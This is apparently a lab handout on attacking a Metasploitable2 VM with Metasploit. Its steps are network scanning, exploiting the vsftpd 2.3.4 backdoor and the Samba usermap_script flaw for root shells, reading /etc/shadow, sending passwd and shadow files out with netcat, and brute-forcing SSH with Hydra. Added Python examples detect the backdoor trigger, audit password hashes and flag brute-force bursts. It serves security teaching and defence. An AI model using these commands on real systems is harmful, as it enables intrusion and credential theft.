Metasploit is an open source platform for vulnerability research, exploit development, and the creation of custom security tools. In this lab, we’re going to be using Metasploit to attack the Metasploitable2 VM.
Prereq – have a local Kali instance and Metasploitable2 VM running.
https://hack.technoherder.com/vm-setup-kali-metasploitable2/
Activities
Part 1 – Getting Started
Update Kali:
$ sudo apt update
$ sudo apt upgrade
Start the Kali PostgreSQL service (which Metasploit uses as its backend):
# Will launch the service postgresql@14-main and then exit...
$ sudo systemctl start postgresql
Initialise the Metasploit PostgreSQL Database:
# Only do this ONCE, not every time!
$ sudo msfdb init
Launch msfconsole in Kali:
$ msfconsole
Verify database connectivity:
msf6> db_status
# Should see:
# [*] Connected to msf. Connection type: postgresql.
Add a new workspace for this lab. A workspace allows you to label data collected (hosts, vulnerabilities, …) for a specific project in the database.
See Also: Managing Workspaces
msf6> workspace -a 178-metasploitable2
(Tip: If you need to select this workspace later, type workspace 178-metasploitable2)
Review the currently configured workspaces. A * marks the currently selected workspace.
msf6> workspace
Run nmap over the subnet where you know the Metasploitable2 VM is running. The db_nmap command will save the results of the nmap scan to the database. Use a -A (ALL THE THINGS!) scan here because we know there are only a few systems in this subnet (Metasploitable2, Kali, perhaps your host OS if you’re using VMware) and thus it won’t take too long.
msf6> db_nmap -A xxx.xxx.xxx.0/24
### e.g. 172.16.196.0/24
View the list of hosts found in the nmap scan:
# Verify that the IP address of your Metasploitable2 VM is listed here
msf6> hosts
View the list of services found in the nmap scan:
msf6> services
Deliverables:
- There are two FTP servers running on Metasploitable. What are they? For your answer, provide the text in the “info” column of the “services” report, and include the version numbers.
Part 2 – Exploiting VSFTPD
Let’s go exploit vsftpd! And learn about Metasploit searching in the process.
First, learn about how search works in Metasploit.
msf6> help search
Then, search for the first target FTP application – VSFTPD:
msf6> search type:exploit name:vsftpd
Deliverables:
- How many exploits were found?
- What is the full path & name of the exploit? (starting with exploit/...)
Select the exploit you found:
# Provide the full path to exploit here
msf6> use exploit/unix/.....
Briefly review the information that Metasploit has on this particular exploit:
msf6> info
From the exploit information, there is a link to a pastebin.com URL that provides a code diff showing the malicious backdoor that was added to the server. Feel free to review the code, it’s a very simple backdoor. If the FTP username is a :) smiley face, a TCP callback shell is launched.
See Also: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
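From the defender's side, the smiley in the USER command is the one thing a legitimate login never sends, so it makes a clean detection signature. The following is an added example (not part of the lab page or of Metasploit): it scans vsftpd protocol-log lines for USER arguments carrying the :) trigger and counts hits per client. The log lines are constructed in the format vsftpd writes when log_ftp_protocol=YES, which is an assumption about the format rather than something taken from the page.

```python
import re
from collections import Counter

# Constructed sample lines in the style vsftpd writes with log_ftp_protocol=YES
# (the format is assumed from vsftpd's own logging, not taken from the lab page).
SAMPLE_LOG = """\
Wed Feb 12 12:19:58 2020 [pid 2211] CONNECT: Client "172.16.196.173"
Wed Feb 12 12:19:58 2020 [pid 2211] FTP command: Client "172.16.196.173", "USER msfadmin"
Wed Feb 12 12:19:59 2020 [pid 2211] FTP response: Client "172.16.196.173", "331 Please specify the password."
Wed Feb 12 12:20:14 2020 [pid 2230] CONNECT: Client "172.16.196.173"
Wed Feb 12 12:20:14 2020 [pid 2230] FTP command: Client "172.16.196.173", "USER Ab3x:)"
Wed Feb 12 12:20:14 2020 [pid 2230] FTP response: Client "172.16.196.173", "331 Please specify the password."
Wed Feb 12 12:20:15 2020 [pid 2230] FTP command: Client "172.16.196.173", "PASS <password>"
"""

# Match the client address and the argument of a USER command.
USER_CMD = re.compile(r'FTP command: Client "(?P<client>[^"]+)", "USER (?P<user>.*)"$')
TRIGGER = ":)"  # the smiley the backdoored vsftpd 2.3.4 build reacts to


def find_backdoor_triggers(log_text):
    """Return (client, username) pairs whose USER argument carries the ':)' trigger.

    Any hit is worth an alert: the lab's session output shows the follow-up
    connection to port 6200 that such a USER command precedes.
    """
    hits = []
    for line in log_text.splitlines():
        m = USER_CMD.search(line)
        if m and TRIGGER in m.group("user"):
            hits.append((m.group("client"), m.group("user")))
    return hits


def triggers_per_client(log_text):
    """Count trigger attempts per client address, e.g. for a SIEM rule or blocklist."""
    return Counter(client for client, _ in find_backdoor_triggers(log_text))


if __name__ == "__main__":
    for client, user in find_backdoor_triggers(SAMPLE_LOG):
        print(f"ALERT vsftpd backdoor trigger from {client}: USER {user!r}")
```

Pair this with a host check for an unexpected listener on TCP port 6200 (the port shown in the session output below) to confirm that a trigger actually opened the backdoor.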
Deliverables:
- What is the pastebin.com URL with the code diff?
For the same exploit, briefly review the options that are available (i.e. might need to be correctly configured).
msf6> show options
Deliverables:
- What are the names of the two options that need to be set? Think of these as environment variables. The “R” stands for “Remote”. Answer in the order listed in Metasploit.
Both of these options must be set for the exploit to target the correct host. Set them now with the information you previously learned about the Metasploitable2 VM:
# Must set remote host (IP address of Metasploitable2 VM)
msf6> set RHOSTS aaa.bbb.ccc.ddd
# Must set remote port
msf6> set RPORT XXXX
Now it’s time to RUN THE EXPLOIT!
msf6> exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 172.16.196.174:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.16.196.174:21 - USER: 331 Please specify the password.
[+] 172.16.196.174:21 - Backdoor service has been spawned, handling...
[+] 172.16.196.174:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.16.196.173:45195 -> 172.16.196.174:6200) at 2020-02-12 12:20:15 -0800
Although you won’t see a command prompt, you now have one. Try typing Linux commands at the console.
Deliverables:
- Using the whoami command, what user are you running as via the exploit?
- Using the uname -a command, what is the version of the Linux kernel running on the Metasploitable2 VM? Provide the full string.
Finally, obtain the hashed forms of the user passwords on the system for future analysis. On Linux systems, these are stored in the “shadow” file. Use this command to look at the /etc/shadow file and only show lines where an account password has been set. (The others are non-login accounts, i.e. local-only.)
cat /etc/shadow | grep '$1'
Deliverables:
- What are the hashed (“shadow”) forms of the user passwords on the system?
After answering this question, feel free to explore the shell, and then CTRL-C to terminate this session and return to Metasploit.
If you want to leave this particular exploit, use the back command:
msf6> back
Part 3 – Exploiting Samba
Samba is an open source implementation of Microsoft file and printer sharing protocols, as well as Active Directory.
First, check the version of Samba that is running (shown in the earlier Nmap scan results). Then, look for exploits in Samba for that version.
msf6> search type:exploit name:samba
Deliverables:
- What version of Samba is running on the Metasploitable2 VM? (Give the full “info” string from the earlier nmap scan)
- How many exploits in Samba (not “Sambar”) does Metasploit currently have? (Note that the labels begin at zero…)
At first glance, checking for version numbers isn’t particularly helpful here. The description either doesn’t include applicable version numbers or the versions listed are older than what we’re targeting. There aren’t that many – maybe we try them all? Or just the ones with a rank of excellent and great? (Or just Google to find out which one Metasploitable2 is susceptible to?)
msf6> use exploit/multi/samba/usermap_script
msf6> info
# Must set remote host (IP address of Metasploitable2 VM)
msf6> set RHOSTS aaa.bbb.ccc.ddd
msf6> exploit
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 172.16.196.2:4444
[*] Command shell session 2 opened (172.16.196.2:4444 -> 172.16.196.4:56315) at 2021-01-20 15:21:59 -0800
Although you won’t see a command prompt, you now have one. Try typing Linux commands at the console, such as whoami.
Deliverables:
- What CVE number was this particular vulnerability in Samba assigned?
- What versions of Samba were susceptible to this vulnerability?
- After using the Samba exploit, what command could you use to confirm the specific version of Samba that is running on the Metasploitable2 VM? Google will help you with a simple command to run on the remote host to obtain this information.
Now that you have access to the Metasploitable2 system via another exploit, let’s try another way to get access to the /etc/passwd and /etc/shadow files on the system – exfiltrating them via Netcat instead of manual copy and paste. This method can also be used to exfiltrate arbitrary files.
See also: Basic methods for data exfiltration
On the Kali system at a regular (not msf6) command prompt, run the Netcat utility, listening, on port 4567:
# Netcat will wait and receive data into the file for FOREVER
$ nc -l -p 4567 > passwd.txt
On the exploited system command prompt, pipe the contents of the /etc/passwd file to the Netcat utility, which is set to connect to Kali at the IP and port specified:
# Update command with the IP address of your Kali VM
cat /etc/passwd | nc xxx.xxx.xxx.xxx 4567
There will be no progress bar or other sign of activity. However, you already know the file is small, so it should transfer quickly. No need to wait for it. Go back to the “listening” netcat, kill it with a CTRL-C and inspect the contents of the passwd.txt file using the cat utility. Does it have the data you were expecting? If so, good! If not, re-check your commands and try again until you’ve exfiltrated the passwd file.
Modify and repeat those two commands to exfiltrate the /etc/shadow file as well.
In this particular instance, it is more helpful to combine the passwd and shadow files together into a single file for future password-cracking (next lab!). Use the unshadow command on the Kali host to merge those two files together, and save it for later.
$ unshadow passwd.txt shadow.txt > metasploitable_logins.txt
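What unshadow does is simple enough to show in a few lines, and the same parsing lets an administrator audit a shadow file properly: the grep '$1' used in Part 2 only finds md5crypt rows, while a real audit should name the hash scheme of every login-capable account and call out the weak ones. This is an added example (not the lab's or John the Ripper's code); the passwd/shadow excerpts are constructed and the hash strings are placeholders in the crypt(3) layout, not the VM's real values.

```python
# Constructed sample excerpts of /etc/passwd and /etc/shadow; the hash strings are
# placeholders in the real crypt(3) layout, not the lab VM's values.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/sh
"""
SHADOW = """\
root:$1$constructed$aaaaaaaaaaaaaaaaaaaaaa:14747:0:99999:7:::
msfadmin:$1$constructed$bbbbbbbbbbbbbbbbbbbbbb:14684:0:99999:7:::
sshd:*:14684:0:99999:7:::
backup:$6$constructed$cccccccccccccccccccccccccccccccccccccccccc:14684:0:99999:7:::
"""

# crypt(3) prefix -> algorithm; md5crypt ($1$, what the lab's grep looks for) and
# 13-character descrypt are the weak schemes to rotate first.
ALGOS = {"1": "md5crypt", "2b": "bcrypt", "2y": "bcrypt", "5": "sha256crypt",
         "6": "sha512crypt", "y": "yescrypt"}


def classify_hash(field):
    """Name the hash type in a shadow password field, or 'locked' / 'empty'."""
    if field == "":
        return "empty"                      # no password at all
    if field[0] in "*!":
        return "locked"                     # '*', '!' or '!<hash>' after passwd -l
    if field.startswith("$") and field.count("$") >= 2:
        return ALGOS.get(field.split("$")[1], "unknown")
    return "descrypt" if len(field) == 13 else "unknown"


def unshadow(passwd_text, shadow_text):
    """Merge like John's unshadow: the 'x' in passwd becomes the hash from shadow."""
    hashes = dict(line.split(":", 2)[:2] for line in shadow_text.splitlines() if line)
    merged = []
    for line in filter(None, passwd_text.splitlines()):
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def audit_password_hashes(merged_lines):
    """{user: algorithm} for every account that a password can log in to."""
    report = {}
    for line in merged_lines:
        user, field = line.split(":", 2)[:2]
        kind = classify_hash(field)
        if kind != "locked":
            report[user] = kind
    return report
```

Run against a real merged file, any "md5crypt", "descrypt" or "empty" entry in the report is the account to fix first.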
Feel free to explore the exploit shell, and then CTRL-C to terminate this session and return to Metasploit.
Deliverables:
- What are the contents of the merged metasploitable_logins.txt file?
Part 4 – Hydra
Hydra is a brute force parallelized login cracker which supports numerous protocols to attack via online attacks, including: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Use Hydra to do online password guessing against a single username in Metasploitable2. How do we know these usernames? Multiple ways: from accounts on other systems, from email addresses, from likely combinations of human names, or just by guessing (root, admin, Administrator, user, etc.)
Run xhydra (the GUI version of the command-line hydra) with the following settings:
- Crack the sys username,
- over the SSH (secure shell) protocol,
- with 4 concurrent tasks (a.k.a. threads) to avoid swamping the server and having it drop requests,
- and using the basic password file from John the Ripper at /usr/share/john/password.lst
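An online guessing run like this one leaves a very recognisable trail on the target: a burst of "Failed password" entries for one account from one source, then an "Accepted password" when the wordlist hits. As an added example (not part of the lab page or of Hydra), the following sliding-window detector flags sources exceeding a failure threshold inside a time window and marks whether a login succeeded right after the burst. The auth.log lines are constructed in standard syslog/sshd style; the year is assumed because syslog stamps carry none.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in syslog/auth.log style (not taken from the lab page).
SAMPLE_AUTH_LOG = """\
Jan 20 15:22:01 metasploitable sshd[4321]: Failed password for sys from 172.16.196.2 port 50211 ssh2
Jan 20 15:22:01 metasploitable sshd[4322]: Failed password for sys from 172.16.196.2 port 50212 ssh2
Jan 20 15:22:02 metasploitable sshd[4323]: Failed password for sys from 172.16.196.2 port 50213 ssh2
Jan 20 15:22:02 metasploitable sshd[4324]: Failed password for sys from 172.16.196.2 port 50214 ssh2
Jan 20 15:22:05 metasploitable sshd[4330]: Accepted password for sys from 172.16.196.2 port 50230 ssh2
Jan 20 15:30:00 metasploitable sshd[4400]: Failed password for msfadmin from 172.16.196.9 port 41000 ssh2
Jan 20 15:31:00 metasploitable sshd[4401]: Accepted password for msfadmin from 172.16.196.9 port 41001 ssh2
"""

LINE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                  r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
                  r"(?P<user>\S+) from (?P<src>\S+) port \d+")


def parse_ts(stamp, year=2021):
    """Syslog stamps carry no year; assume one (a real pipeline takes it from the file)."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=4, window_s=60):
    """Sources with >= threshold failed logins inside any window_s-second window.
    Returns {src: {"failures": n, "users": set, "success_after_burst": bool}}."""
    events = []
    for line in log_text.splitlines():
        m = LINE.search(line)
        if m:
            events.append((parse_ts(m["ts"]), m["src"], m["user"], m["result"]))
    events.sort()
    recent = defaultdict(list)          # src -> failure timestamps inside the window
    alerts = {}
    for ts, src, user, result in events:
        if result == "Failed":
            q = recent[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.pop(0)                # drop failures that aged out of the window
            if len(q) >= threshold:
                a = alerts.setdefault(src, {"failures": 0, "users": set(),
                                            "success_after_burst": False})
                a["failures"] = max(a["failures"], len(q))
                a["users"].add(user)
        elif src in alerts:             # a success after a burst: guessing worked
            alerts[src]["success_after_burst"] = True
    return alerts
```

A single failure from 172.16.196.9 stays below the threshold, while the four-task burst from 172.16.196.2 followed by an accepted login is exactly the pattern to page on.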
Deliverables:
- What is the command-line invocation that the GUI built from setting those specified options? It’s shown at the bottom of the window.
- From the in-progress password crack attempt, how many attempts per minute is Hydra attempting?
- How long did it take Hydra to find this common password?
- What was the password for that account?
Part 5 – Exploiting Something Else
It’s time for you to explore Metasploit!
Using Metasploit and your Google skills, discover another exploit that works on the Metasploitable2 VM. There are many described online in blogs and tutorials, or you could use the list of services and search functionality to pull out a vulnerability without external knowledge.
Deliverables:
- What service is the vulnerability in?
- What is the full name (exploit/...) of the vulnerability in Metasploit?
- What options does the exploit need to function?
- How does the vulnerability/exploit work?